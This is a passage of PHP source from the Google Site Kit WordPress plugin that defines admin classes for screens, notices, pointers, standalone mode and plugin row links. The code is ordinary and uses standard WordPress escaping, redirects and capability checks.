Google\Site_Kit\Core\User\Initial_Setup_Settings; use Google\Site_Kit\Core\Util\Feature_Flags; /** * Class managing admin screens. * * @since 1.0.0 * @access private * @ignore */ final class Screens { const PREFIX = 'googlesitekit-'; const PARENT_SLUG_NULL = self::PREFIX . 'null'; /** * Plugin context. * * @since 1.0.0 * @var Context */ private $context; /** * Assets API instance. * * @since 1.0.0 * @var Assets */ private $assets; /** * Modules instance. * * @since 1.7.0 * @var Modules */ private $modules; /** * Authentication instance. * * @since 1.72.0 * @var Authentication */ private $authentication; /** * User_Options instance. * * @since 1.167.0 * @var User_Options */ private $user_options; /** * Associative array of $hook_suffix => $screen pairs. * * @since 1.0.0 * @var array */ private $screens = array(); /** * Constructor. * * @since 1.0.0 * * @param Context $context Plugin context. * @param Assets $assets Optional. Assets API instance. Default is a new instance. * @param Modules $modules Optional. Modules instance. Default is a new instance. * @param Authentication $authentication Optional. Authentication instance. Default is a new instance. * @param User_Options $user_options Optional. User_Options instance. Default is a new instance. */ public function __construct( Context $context, ?Assets $assets = null, ?Modules $modules = null, ?Authentication $authentication = null, ?User_Options $user_options = null ) { $this->context = $context; $this->assets = $assets ?: new Assets( $this->context ); $this->modules = $modules ?: new Modules( $this->context ); $this->authentication = $authentication ?: new Authentication( $this->context ); $this->user_options = $user_options ?: new User_Options( $this->context ); } /** * Registers functionality through WordPress hooks. * * @since 1.0.0 */ public function register() { if ( $this->context->is_network_mode() ) { add_action( 'network_admin_menu', function () { $this->add_screens(); } ); } add_action( 'admin_menu', function () { $this->add_screens(); } ); add_action( 'admin_enqueue_scripts', function ( $hook_suffix ) { $this->enqueue_screen_assets( $hook_suffix ); } ); add_action( 'admin_page_access_denied', function () { // Redirect dashboard to splash if no dashboard access (yet). $this->no_access_redirect_dashboard_to_splash(); // Redirect splash to (shared) dashboard if splash is dismissed. $this->no_access_redirect_splash_to_dashboard(); // Redirect module pages to dashboard. $this->no_access_redirect_module_to_dashboard(); } ); // Ensure the menu icon always is rendered correctly, without enqueueing a global CSS file. add_action( 'admin_head', function () { ?> <style type="text/css"> #adminmenu .toplevel_page_googlesitekit-dashboard img { width: 16px; } #adminmenu .toplevel_page_googlesitekit-dashboard.current img, #adminmenu .toplevel_page_googlesitekit-dashboard.wp-has-current-submenu img { opacity: 1; } </style> <?php } ); $remove_notices_callback = function () { global $hook_suffix; if ( empty( $hook_suffix ) ) { return; } if ( isset( $this->screens[ $hook_suffix ] ) ) { remove_all_actions( current_action() ); } }; add_action( 'admin_notices', $remove_notices_callback, -9999 ); add_action( 'network_admin_notices', $remove_notices_callback, -9999 ); add_action( 'all_admin_notices', $remove_notices_callback, -9999 ); add_filter( 'custom_menu_order', '__return_true' ); add_filter( 'menu_order', function ( array $menu_order ) { // Move the Site Kit dashboard menu item to be one after the index.php item if it exists. $dashboard_index = array_search( 'index.php', $menu_order, true ); $sitekit_index = false; foreach ( $menu_order as $key => $value ) { if ( strpos( $value, self::PREFIX ) === 0 ) { $sitekit_index = $key; $sitekit_value = $value; break; } } if ( false === $dashboard_index || false === $sitekit_index ) { return $menu_order; } unset( $menu_order[ $sitekit_index ] ); array_splice( $menu_order, $dashboard_index + 1, 0, $sitekit_value ); return $menu_order; } ); } /** * Gets the Screen instance for a given hook suffix. * * @since 1.11.0 * * @param string $hook_suffix The hook suffix associated with the screen to retrieve. * @return Screen|null Screen instance if available, otherwise null; */ public function get_screen( $hook_suffix ) { return isset( $this->screens[ $hook_suffix ] ) ? $this->screens[ $hook_suffix ] : null; } /** * Adds all screens to the admin. * * @since 1.0.0 */ private function add_screens() { $screens = $this->get_screens(); array_walk( $screens, array( $this, 'add_screen' ) ); } /** * Adds the given screen to the admin. * * @since 1.0.0 * * @param Screen $screen Screen to add. */ private function add_screen( Screen $screen ) { $hook_suffix = $screen->add( $this->context ); if ( empty( $hook_suffix ) ) { return; } add_action( "load-{$hook_suffix}", function () use ( $screen ) { $screen->initialize( $this->context ); } ); $this->screens[ $hook_suffix ] = $screen; } /** * Enqueues assets if a plugin screen matches the given hook suffix. * * @since 1.0.0 * * @param string $hook_suffix Hook suffix for the current admin screen. */ private function enqueue_screen_assets( $hook_suffix ) { if ( ! isset( $this->screens[ $hook_suffix ] ) ) { return; } $this->screens[ $hook_suffix ]->enqueue_assets( $this->assets ); $this->modules->enqueue_assets(); } /** * Redirects from the dashboard to the splash screen if permissions to access the dashboard are currently not met. * * Dashboard permission access is conditional based on whether the user has successfully authenticated. When * e.g. accessing the dashboard manually or having it open in a separate tab while disconnecting in the other tab, * it is a better user experience to redirect to the splash screen so that the user can re-authenticate. * * The only time the dashboard should fail with the regular WordPress permissions error is when the current user is * not eligible for accessing Site Kit entirely, i.e. if they are not allowed to authenticate. * * @since 1.12.0 */ private function no_access_redirect_dashboard_to_splash() { global $plugin_page; // At this point, our preferred `$hook_suffix` is not set, and the dashboard page will not even be registered, // so we need to rely on the `$plugin_page` global here. if ( ! isset( $plugin_page ) || self::PREFIX . 'dashboard' !== $plugin_page ) { return; } if ( current_user_can( Permissions::VIEW_SPLASH ) ) { wp_safe_redirect( $this->context->admin_url( 'splash' ) ); exit; } } /** * Redirects from the splash to the dashboard screen if permissions to access the splash are currently not met. * * Admins always have the ability to view the splash page, so this redirects non-admins who have access * to view the shared dashboard if the splash has been dismissed. * Currently the dismissal check is built into the capability for VIEW_SPLASH so this is implied. * * @since 1.77.0 */ private function no_access_redirect_splash_to_dashboard() { global $plugin_page; if ( ! isset( $plugin_page ) || self::PREFIX . 'splash' !== $plugin_page ) { return; } if ( current_user_can( Permissions::VIEW_DASHBOARD ) ) { wp_safe_redirect( $this->context->admin_url() ); exit; } } /** * Redirects module pages to the dashboard or splash based on user capability. * * @since 1.69.0 */ private function no_access_redirect_module_to_dashboard() { global $plugin_page; $legacy_module_pages = array( self::PREFIX . 'module-adsense', self::PREFIX . 'module-analytics', self::PREFIX . 'module-search-console', ); if ( ! in_array( $plugin_page, $legacy_module_pages, true ) ) { return; } // Note: the use of add_query_arg is intentional below because it preserves // the current query parameters in the URL. if ( current_user_can( Permissions::VIEW_DASHBOARD ) ) { wp_safe_redirect( add_query_arg( 'page', self::PREFIX . 'dashboard' ) ); exit; } if ( current_user_can( Permissions::VIEW_SPLASH ) ) { wp_safe_redirect( add_query_arg( 'page', self::PREFIX . 'splash' ) ); exit; } } /** * Gets available admin screens. * * @since 1.0.0 * * @return array List of Screen instances. */ private function get_screens() { $show_splash_in_menu = current_user_can( Permissions::VIEW_SPLASH ) && ! current_user_can( Permissions::VIEW_DASHBOARD ); $screens = array( new Screen( self::PREFIX . 'dashboard', array( 'title' => __( 'Dashboard', 'google-site-kit' ), 'capability' => Permissions::VIEW_DASHBOARD, 'enqueue_callback' => function ( Assets $assets ) { if ( $this->context->input()->filter( INPUT_GET, 'permaLink' ) ) { $assets->enqueue_asset( 'googlesitekit-entity-dashboard' ); } else { $assets->enqueue_asset( 'googlesitekit-main-dashboard' ); } }, 'initialize_callback' => function ( Context $context ) { if ( ! Feature_Flags::enabled( 'setupFlowRefresh' ) ) { return; } $is_view_only = ! $this->authentication->is_authenticated(); if ( ! $is_view_only ) { $initial_setup_settings = ( new Initial_Setup_Settings( $this->user_options ) )->get(); $is_analytics_setup_complete = $initial_setup_settings['isAnalyticsSetupComplete']; if ( false === $is_analytics_setup_complete ) { $is_analytics_connected = $this->modules->is_module_connected( 'analytics-4' ); if ( $is_analytics_connected ) { wp_safe_redirect( $context->admin_url( 'key-metrics-setup', array( 'showProgress' => 'true', ) ) ); exit; } else { $slug = $context->input()->filter( INPUT_GET, 'slug' ); $show_progress = $context->input()->filter( INPUT_GET, 'showProgress', FILTER_VALIDATE_BOOLEAN ); $re_auth = $context->input()->filter( INPUT_GET, 'reAuth', FILTER_VALIDATE_BOOLEAN ); if ( 'analytics-4' === $slug && $re_auth && $show_progress ) { return; } wp_safe_redirect( $context->admin_url( 'dashboard', array( 'slug' => 'analytics-4', 'showProgress' => 'true', 'reAuth' => 'true', ) ) ); exit; } } } }, 'render_callback' => function ( Context $context ) { $is_view_only = ! $this->authentication->is_authenticated(); $setup_slug = htmlspecialchars( $context->input()->filter( INPUT_GET, 'slug' ) ?: '' ); $reauth = $context->input()->filter( INPUT_GET, 'reAuth', FILTER_VALIDATE_BOOLEAN ); if ( $context->input()->filter( INPUT_GET, 'permaLink' ) ) { ?> <div id="js-googlesitekit-entity-dashboard" data-view-only="<?php echo esc_attr( $is_view_only ); ?>" class="googlesitekit-page"></div> <?php } else { $setup_module_slug = $setup_slug && $reauth ? $setup_slug : ''; if ( $setup_module_slug ) { $active_modules = $this->modules->get_active_modules(); if ( ! array_key_exists( $setup_module_slug, $active_modules ) ) { try { $module_details = $this->modules->get_module( $setup_module_slug ); /* translators: %s: The module name */ $message = sprintf( __( 'The %s module cannot be set up as it has not been activated yet.', 'google-site-kit' ), $module_details->name ); } catch ( \Exception $e ) { $message = $e->getMessage(); } wp_die( sprintf( '<span class="googlesitekit-notice">%s</span>', esc_html( $message ) ), 403 ); } } ?> <div id="js-googlesitekit-main-dashboard" data-view-only="<?php echo esc_attr( $is_view_only ); ?>" data-setup-module-slug="<?php echo esc_attr( $setup_module_slug ); ?>" class="googlesitekit-page"></div> <?php } }, ) ), new Screen( self::PREFIX . 'splash', array( 'title' => __( 'Dashboard', 'google-site-kit' ), 'capability' => Permissions::VIEW_SPLASH, 'parent_slug' => $show_splash_in_menu ? Screen::MENU_SLUG : self::PARENT_SLUG_NULL, // This callback will redirect to the dashboard on successful authentication. 'initialize_callback' => function ( Context $context ) { // Get the dismissed items for this user. $user_options = new User_Options( $context ); $dismissed_items = new Dismissed_Items( $user_options ); $splash_context = $context->input()->filter( INPUT_GET, 'googlesitekit_context' ); $reset_session = $context->input()->filter( INPUT_GET, 'googlesitekit_reset_session', FILTER_VALIDATE_BOOLEAN ); // If the user is authenticated, redirect them to the disconnect URL and then send them back here. if ( ! $reset_session && 'revoked' === $splash_context && $this->authentication->is_authenticated() ) { $this->authentication->disconnect(); wp_safe_redirect( add_query_arg( array( 'googlesitekit_reset_session' => 1 ) ) ); exit; } // Don't consider redirect if the current user cannot access the dashboard (yet). if ( ! current_user_can( Permissions::VIEW_DASHBOARD ) ) { return; } // Redirect to dashboard if user is authenticated or if // they have already accessed the shared dashboard. if ( $this->authentication->is_authenticated() || ( ! current_user_can( Permissions::AUTHENTICATE ) && $dismissed_items->is_dismissed( 'shared_dashboard_splash' ) && current_user_can( Permissions::VIEW_SHARED_DASHBOARD ) ) ) { wp_safe_redirect( $context->admin_url( 'dashboard', array( // Pass through the notification parameter, or removes it if none. 'notification' => $context->input()->filter( INPUT_GET, 'notification' ), ) ) ); exit; } }, ) ), new Screen( self::PREFIX . 'settings', array( 'title' => __( 'Settings', 'google-site-kit' ), 'capability' => Permissions::MANAGE_OPTIONS, ) ), ); $screens[] = new Screen( self::PREFIX . 'user-input', array( 'title' => __( 'User Input', 'google-site-kit' ), 'capability' => Permissions::MANAGE_OPTIONS, 'parent_slug' => self::PARENT_SLUG_NULL, ) ); $screens[] = new Screen( self::PREFIX . 'ad-blocking-recovery', array( 'title' => __( 'Ad Blocking Recovery', 'google-site-kit' ), 'capability' => Permissions::MANAGE_OPTIONS, 'parent_slug' => self::PARENT_SLUG_NULL, ) ); $screens[] = new Screen( self::PREFIX . 'metric-selection', array( 'title' => __( 'Select Key Metrics', 'google-site-kit' ), 'capability' => Permissions::MANAGE_OPTIONS, 'parent_slug' => self::PARENT_SLUG_NULL, // This callback will redirect to the dashboard if key metrics is already set up. 'initialize_callback' => function ( Context $context ) { $options = new Options( $context ); $is_key_metrics_setup = ( new Key_Metrics_Setup_Completed_By( $options ) )->get(); if ( $is_key_metrics_setup ) { wp_safe_redirect( $context->admin_url( 'dashboard' ) ); exit; } }, ) ); $screens[] = new Screen( self::PREFIX . 'key-metrics-setup', array( 'title' => __( 'Key Metrics Setup', 'google-site-kit' ), 'capability' => Permissions::MANAGE_OPTIONS, 'parent_slug' => self::PARENT_SLUG_NULL, ) ); return $screens; } } <?php /** * Class Google\Site_Kit\Core\Admin\Pointer * * @package Google\Site_Kit * @copyright 2022 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Admin; /** * Class representing a single pointer. * * @since 1.83.0 * @access private * @ignore */ final class Pointer { /** * Unique pointer slug. * * @since 1.83.0 * @var string */ private $slug; /** * Pointer arguments. * * @since 1.83.0 * @var array */ private $args = array(); /** * Constructor. * * @since 1.83.0 * * @param string $slug Unique pointer slug. * @param array $args { * Associative array of pointer arguments. * * @type string $title Required. Pointer title. * @type string $content Required. Pointer content. May contain inline HTML tags. * @type string $target_id Required. ID of the element the pointer should be attached to. * @type string|array $position Optional. Position of the pointer. Can be 'top', 'bottom', 'left', 'right', * or an array of `edge` and `align`. Default 'top'. * @type callable $active_callback Optional. Callback function to determine whether the pointer is active in * the current context. The current admin screen's hook suffix is passed to * the callback. Default is that the pointer is active unconditionally. * } */ public function __construct( $slug, array $args ) { $this->slug = $slug; $this->args = wp_parse_args( $args, array( 'title' => '', 'content' => '', 'target_id' => '', 'position' => 'top', 'active_callback' => null, 'buttons' => null, 'class' => '', ) ); } /** * Gets the pointer slug. * * @since 1.83.0 * * @return string Unique pointer slug. */ public function get_slug() { return $this->slug; } /** * Gets the pointer title. * * @since 1.83.0 * * @return string Pointer title. */ public function get_title() { return $this->args['title']; } /** * Gets the pointer buttons. * * @since 1.166.0 * * @return string Pointer buttons. */ public function get_buttons() { return $this->args['buttons']; } /** * Gets the pointer custom class. * * @since 1.166.0 * * @return string|array Pointer custom class. */ public function get_class() { return $this->args['class']; } /** * Gets the pointer content. * * @since 1.83.0 * * @return string Pointer content. */ public function get_content() { if ( is_callable( $this->args['content'] ) ) { return call_user_func( $this->args['content'] ); } else { return '<p>' . wp_kses( $this->args['content'], 'googlesitekit_admin_pointer' ) . '</p>'; } } /** * Gets the pointer target ID. * * @since 1.83.0 * * @return string Pointer target ID. */ public function get_target_id() { return $this->args['target_id']; } /** * Gets the pointer position. * * @since 1.83.0 * * @return string|array Pointer position. */ public function get_position() { return $this->args['position']; } /** * Checks whether the pointer is active. * * This method executes the active callback in order to determine whether the pointer should be active or not. * * @since 1.83.0 * * @param string $hook_suffix The current admin screen hook suffix. * @return bool True if the pointer is active, false otherwise. */ public function is_active( $hook_suffix ) { if ( empty( $this->args['title'] ) || empty( $this->args['content'] ) || empty( $this->args['target_id'] ) ) { return false; } if ( ! is_callable( $this->args['active_callback'] ) ) { return true; } return (bool) call_user_func( $this->args['active_callback'], $hook_suffix ); } } <?php /** * Class Google\Site_Kit\Core\Admin\Notice * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Admin; /** * Class representing a single notice. * * @since 1.0.0 * @access private * @ignore */ final class Notice { const TYPE_SUCCESS = 'success'; const TYPE_INFO = 'info'; const TYPE_WARNING = 'warning'; const TYPE_ERROR = 'error'; /** * Unique notice slug. * * @since 1.0.0 * @var string */ private $slug; /** * Notice arguments. * * @since 1.0.0 * @var array */ private $args = array(); /** * Constructor. * * @since 1.0.0 * * @param string $slug Unique notice slug. * @param array $args { * Associative array of notice arguments. * * @type string $content Required notice content. May contain inline HTML tags. * @type string $type Notice type. Either 'success', 'info', 'warning', 'error'. Default 'info'. * @type callable $active_callback Callback function to determine whether the notice is active in the * current context. The current admin screen's hook suffix is passed to * the callback. Default is that the notice is active unconditionally. * @type bool $dismissible Whether the notice should be dismissible. Default false. * } */ public function __construct( $slug, array $args ) { $this->slug = $slug; $this->args = wp_parse_args( $args, array( 'content' => '', 'type' => self::TYPE_INFO, 'active_callback' => null, 'dismissible' => false, ) ); } /** * Gets the notice slug. * * @since 1.0.0 * * @return string Unique notice slug. */ public function get_slug() { return $this->slug; } /** * Checks whether the notice is active. * * This method executes the active callback in order to determine whether the notice should be active or not. * * @since 1.0.0 * * @param string $hook_suffix The current admin screen hook suffix. * @return bool True if the notice is active, false otherwise. */ public function is_active( $hook_suffix ) { if ( ! $this->args['content'] ) { return false; } if ( ! $this->args['active_callback'] ) { return true; } return (bool) call_user_func( $this->args['active_callback'], $hook_suffix ); } /** * Renders the notice. * * @since 1.0.0 */ public function render() { if ( is_callable( $this->args['content'] ) ) { $content = call_user_func( $this->args['content'] ); if ( empty( $content ) ) { return; } } else { $content = '<p>' . wp_kses( $this->args['content'], 'googlesitekit_admin_notice' ) . '</p>'; } $class = 'notice notice-' . $this->args['type']; if ( $this->args['dismissible'] ) { $class .= ' is-dismissible'; } ?> <div id="<?php echo esc_attr( 'googlesitekit-notice-' . $this->slug ); ?>" class="<?php echo esc_attr( $class ); ?>"> <?php echo $content; /* phpcs:ignore WordPress.Security.EscapeOutput */ ?> </div> <?php } } <?php /** * Class Google\Site_Kit\Core\Admin\Standalone * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Admin; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Assets\Stylesheet; /** * Class managing standalone mode. * * @since 1.8.0 * @access private * @ignore */ final class Standalone { /** * Plugin context. * * @since 1.8.0 * * @var Context */ private $context; /** * Constructor. * * @since 1.8.0 * * @param Context $context Plugin context. */ public function __construct( Context $context ) { $this->context = $context; } /** * Standalone mode * * @since 1.8.0 */ public function register() { if ( ! $this->is_standalone() ) { return; } /** * Appends the standalone admin body class. * * @since 1.8.0 * * @param string $admin_body_classes Admin body classes. * @return string Filtered admin body classes. */ add_filter( 'admin_body_class', function ( $admin_body_classes ) { return "{$admin_body_classes} googlesitekit-standalone"; } ); remove_action( 'in_admin_header', 'wp_admin_bar_render', 0 ); add_filter( 'admin_footer_text', '__return_empty_string', PHP_INT_MAX ); add_filter( 'update_footer', '__return_empty_string', PHP_INT_MAX ); add_action( 'admin_head', function () { $this->print_standalone_styles(); } ); } /** * Detects if we are in Google Site Kit standalone mode. * * @since 1.8.0 * * @return boolean True when in standalone mode, else false. */ public function is_standalone() { global $pagenow; $page = htmlspecialchars( $this->context->input()->filter( INPUT_GET, 'page' ) ?: '' ); $standalone = $this->context->input()->filter( INPUT_GET, 'googlesitekit-standalone', FILTER_VALIDATE_BOOLEAN ); return ( 'admin.php' === $pagenow && false !== strpos( $page, 'googlesitekit' ) && $standalone ); } /** * Enqueues styles for standalone mode. * * @since 1.8.0 */ private function print_standalone_styles() { ?> <style type="text/css"> html { padding-top: 0 !important; } body.googlesitekit-standalone #adminmenumain { display: none; } body.googlesitekit-standalone #wpcontent { margin-left: 0; } </style> <?php } } <?php /** * Class Google\Site_Kit\Core\Admin\Screen * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Admin; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Assets\Assets; use Google\Site_Kit\Core\Util\Google_Icon; use Google\Site_Kit\Core\Util\Requires_Javascript_Trait; /** * Class representing a single screen. * * @since 1.0.0 * @access private * @ignore */ final class Screen { use Requires_Javascript_Trait; const MENU_SLUG = 'googlesitekit'; /** * Unique screen slug. * * @since 1.0.0 * @var string */ private $slug; /** * Screen arguments. * * @since 1.0.0 * @var array */ private $args = array(); /** * Constructor. * * @since 1.0.0 * * @param string $slug Unique screen slug. * @param array $args { * Associative array of screen arguments. * * @type callable $render_callback Required callback to render the page content. * @type string $title Required screen title. * @type string $capability Capability required to access the screen. Default is 'manage_options'. * @type string $menu_title Title to display in the menu (only if $add_to_menu is true). Default is * the value of $title. * @type string $parent_slug Slug of the parent menu screen (only if $add_to_menu is true). Default * empty string (which means it will be a top-level page). * @type callable $enqueue_callback Callback to enqueue additional scripts or stylesheets. The base admin * script and stylesheet will always be enqueued. Default null. * @type callable $initialize_callback Callback to run actions when initializing the screen, before headers are * sent and markup is generated. Default null. * } */ public function __construct( $slug, array $args ) { $this->slug = $slug; $this->args = wp_parse_args( $args, array( 'render_callback' => null, 'title' => '', 'capability' => 'manage_options', 'menu_title' => '', 'parent_slug' => self::MENU_SLUG, 'enqueue_callback' => null, 'initialize_callback' => null, ) ); if ( empty( $this->args['menu_title'] ) ) { $this->args['menu_title'] = $this->args['title']; } $this->args['title'] = __( 'Site Kit by Google', 'google-site-kit' ) . ' ' . $this->args['title']; } /** * Gets the unique screen slug. * * @since 1.0.0 * * @return string Unique screen slug. */ public function get_slug() { return $this->slug; } /** * Adds the screen to the WordPress admin backend. * * @since 1.0.0 * * @param Context $context Plugin context, used for URL generation. * @return string Hook suffix of the screen, or empty string if not added. */ public function add( Context $context ) { static $menu_slug = null; if ( ! $this->args['title'] ) { return ''; } // A parent slug of null means the screen will not appear in the menu. $parent_slug = null; // If parent slug is provided, use it as parent. if ( ! empty( $this->args['parent_slug'] ) ) { $parent_slug = $this->args['parent_slug']; // If parent slug is 'googlesitekit', append to main Site Kit menu. if ( self::MENU_SLUG === $parent_slug ) { // If this is null, it means no menu has been added yet. if ( null === $menu_slug ) { add_menu_page( $this->args['title'], __( 'Site Kit', 'google-site-kit' ), $this->args['capability'], $this->slug, '', 'data:image/svg+xml;base64,' . Google_Icon::to_base64() ); $menu_slug = $this->slug; /** * An SVG icon file needs to be colored (filled) based on the theme color setting. * * This exists in js as wp.svgPainter() per: * https://github.com/WordPress/WordPress/blob/5.7/wp-admin/js/svg-painter.js * * The downside of the js approach is that we get a brief flash of an unstyled icon * until the JS runs. * * A user can pick a custom Admin Color Scheme, which is only available in admin_init * or later actions. add_menu_page runs on the admin_menu action, which precedes admin_init * per https://codex.wordpress.org/Plugin_API/Action_Reference * * WordPress provides some color schemes out of the box, but they can also be added via * wp_admin_css_color() * * Our workaround is to set the icon and subsequently replace it in current_screen, which is * what we do in the following action. */ add_action( 'current_screen', function () { global $menu, $_wp_admin_css_colors; if ( ! is_array( $menu ) ) { return; } $color_scheme = get_user_option( 'admin_color' ) ?: 'fresh'; // If we're on one of the sitekit pages, use the 'current' color, otherwise use the 'base' color. // @see wp_admin_css_color(). $color_key = false === strpos( get_current_screen()->id, 'googlesitekit' ) ? 'base' : 'current'; if ( empty( $_wp_admin_css_colors[ $color_scheme ]->icon_colors[ $color_key ] ) ) { return; } $color = $_wp_admin_css_colors[ $color_scheme ]->icon_colors[ $color_key ]; foreach ( $menu as &$item ) { if ( 'googlesitekit-dashboard' === $item[2] ) { $item[6] = 'data:image/svg+xml;base64,' . Google_Icon::to_base64( Google_Icon::with_fill( $color ) ); break; } } }, 100 ); } // Set parent slug to actual slug of main Site Kit menu. $parent_slug = $menu_slug; } } // If submenu item or not in menu, use add_submenu_page(). return (string) add_submenu_page( $parent_slug, $this->args['title'], $this->args['menu_title'], $this->args['capability'], $this->slug, function () use ( $context ) { $this->render( $context ); } ); } /** * Runs actions when initializing the screen, before sending headers and generating markup. * * @since 1.0.0 * * @param Context $context Plugin context. */ public function initialize( Context $context ) { if ( ! $this->args['initialize_callback'] ) { return; } call_user_func( $this->args['initialize_callback'], $context ); } /** * Enqueues assets for the screen. * * @since 1.0.0 * * @param Assets $assets Assets instance to rely on for enqueueing assets. */ public function enqueue_assets( Assets $assets ) { // Enqueue base admin screen stylesheet. $assets->enqueue_asset( 'googlesitekit-admin-css' ); $cb = is_callable( $this->args['enqueue_callback'] ) ? $this->args['enqueue_callback'] : function ( Assets $assets ) { $assets->enqueue_asset( $this->slug ); }; call_user_func( $cb, $assets ); } /** * Renders the screen content. * * @since 1.0.0 * * @param Context $context Plugin context. */ private function render( Context $context ) { $cb = is_callable( $this->args['render_callback'] ) ? $this->args['render_callback'] : function () { printf( '<div id="js-%s" class="googlesitekit-page"></div>', esc_attr( $this->slug ) ); }; echo '<div class="googlesitekit-plugin">'; $this->render_noscript_html(); call_user_func( $cb, $context ); echo '</div>'; } } <?php /** * Class Google\Site_Kit\Core\Admin\Plugin_Row_Meta * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Admin; /** * Class for managing plugin row meta. * * @since 1.24.0 * @access private * @ignore */ class Plugin_Row_Meta { /** * Registers functionality through WordPress hooks. * * @since 1.24.0 */ public function register() { add_filter( 'plugin_row_meta', function ( $meta, $plugin_file ) { if ( GOOGLESITEKIT_PLUGIN_BASENAME === $plugin_file ) { return array_merge( $meta, $this->get_plugin_row_meta() ); } return $meta; }, 10, 2 ); } /** * Builds an array of anchor elements to be shown in the plugin row. * * @since 1.24.0 * * @return string[] Array of links as HTML strings. */ private function get_plugin_row_meta() { return array( '<a href="https://wordpress.org/support/plugin/google-site-kit/reviews/#new-post">' . __( 'Rate Site Kit', 'google-site-kit' ) . '</a>', '<a href="https://wordpress.org/support/plugin/google-site-kit/#new-post">' . __( 'Support', 'google-site-kit' ) . '</a>', ); } } <?php /** * Class Google\Site_Kit\Core\Admin\Notices * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Admin; /** * Class managing admin notices. * * @since 1.0.0 * @access private * @ignore */ final class Notices { /** * Registers functionality through WordPress hooks. * * @since 1.0.0 */ public function register() { $callback = function () { global $hook_suffix; if ( empty( $hook_suffix ) ) { return; } $this->render_notices( $hook_suffix ); }; add_action( 'admin_notices', $callback ); add_action( 'network_admin_notices', $callback ); } /** * Renders admin notices. * * @since 1.0.0 * * @param string $hook_suffix The current admin screen hook suffix. */ private function render_notices( $hook_suffix ) { $notices = $this->get_notices(); if ( empty( $notices ) ) { return; } /** * Notice object. * * @var Notice $notice Notice object. */ foreach ( $notices as $notice ) { if ( ! $notice->is_active( $hook_suffix ) ) { continue; } $notice->render(); } } /** * Gets available admin notices. * * @since 1.0.0 * * @return array List of Notice instances. */ private function get_notices() { /** * Filters the list of available admin notices. * * @since 1.0.0 * * @param array $notices List of Notice instances. */ $notices = apply_filters( 'googlesitekit_admin_notices', array() ); return array_filter( $notices, function ( $notice ) { return $notice instanceof Notice; } ); } } <?php /** * Class Google\Site_Kit\Core\Admin\Pointers * * @package Google\Site_Kit\Core\Admin * @copyright 2022 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Admin; use Google\Site_Kit\Core\Util\BC_Functions; use Google\Site_Kit\Core\Util\Method_Proxy_Trait; /** * Class for managing pointers. * * @since 1.83.0 * @access private * @ignore */ class Pointers { use Method_Proxy_Trait; /** * Registers functionality through WordPress hooks. * * @since 1.83.0 */ public function register() { add_action( 'admin_enqueue_scripts', $this->get_method_proxy( 'enqueue_pointers' ) ); } /** * Enqueues pointer scripts. * * @since 1.83.0 * * @param string $hook_suffix The current admin page. */ private function enqueue_pointers( $hook_suffix ) { if ( empty( $hook_suffix ) ) { return; } $pointers = $this->get_pointers(); if ( empty( $pointers ) ) { return; } $active_pointers = array_filter( $pointers, function ( Pointer $pointer ) use ( $hook_suffix ) { return $pointer->is_active( $hook_suffix ); } ); if ( empty( $active_pointers ) ) { return; } wp_enqueue_style( 'wp-pointer' ); // Dashboard styles are required where pointers are used to ensure proper styling. wp_enqueue_style( 'googlesitekit-wp-dashboard-css' ); wp_enqueue_script( 'wp-pointer' ); add_action( 'admin_print_footer_scripts', function () use ( $active_pointers ) { foreach ( $active_pointers as $pointer ) { $this->print_pointer_script( $pointer ); } } ); } /** * Gets pointers. * * @since 1.83.0 * * @return Pointer[] Array of pointers. */ private function get_pointers() { /** * Filters the list of available pointers. * * @since 1.83.0 * * @param array $pointers List of Pointer instances. */ $pointers = apply_filters( 'googlesitekit_admin_pointers', array() ); return array_filter( $pointers, function ( $pointer ) { return $pointer instanceof Pointer; } ); } /** * Prints script for a given pointer. * * @since 1.83.0 * @since 1.166.0 Updated to support buttons and header dismiss icon. * * @param Pointer $pointer Pointer to print. */ private function print_pointer_script( $pointer ) { $content = $pointer->get_content(); if ( empty( $content ) ) { return; } $buttons = $pointer->get_buttons(); if ( $buttons ) { // Content including buttons escaped below in the inline script with wp_kses. $content .= '<div class="googlesitekit-pointer-buttons">' . $buttons . '</div>'; } $class = array( 'wp-pointer' ); if ( $pointer->get_class() ) { $class[] = $pointer->get_class(); } $kses_title = array( 'span' => array( 'class' => array() ), 'button' => array( 'class' => array(), 'type' => array(), 'data-action' => array(), ), ); $kses_content = array( 'a' => array( 'href' => array(), 'class' => array(), 'target' => array(), 'rel' => array(), 'data-action' => array(), ), 'h4' => array(), 'p' => array( 'class' => array() ), 'br' => array(), 'strong' => array(), 'em' => array(), 'button' => array( 'class' => array(), 'type' => array(), 'data-action' => array(), ), 'div' => array( 'class' => array() ), ); BC_Functions::wp_print_inline_script_tag( <<<'JS' ( function ( $, wp, config ) { function initPointer() { const options = { content: '<h3>' + config.title + '</h3>' + config.content, position: JSON.parse( config.position ), pointerWidth: 420, pointerClass: config.class, close: function() { wp.ajax.post( 'dismiss-wp-pointer', { pointer: config.slug } ); }, buttons: function( event, container ) { container.pointer.on( 'click', '[data-action="dismiss"]', function() { container.element.pointer( 'close' ); } ); } }; $( '#' + config.targetId ).pointer( options ).pointer( 'open' ); } $( initPointer ); } )( window.jQuery, window.wp, { ...document.currentScript.dataset } ); JS , array( 'data-slug' => $pointer->get_slug(), 'data-class' => implode( ' ', $class ), 'data-target-id' => $pointer->get_target_id(), 'data-title' => wp_kses( 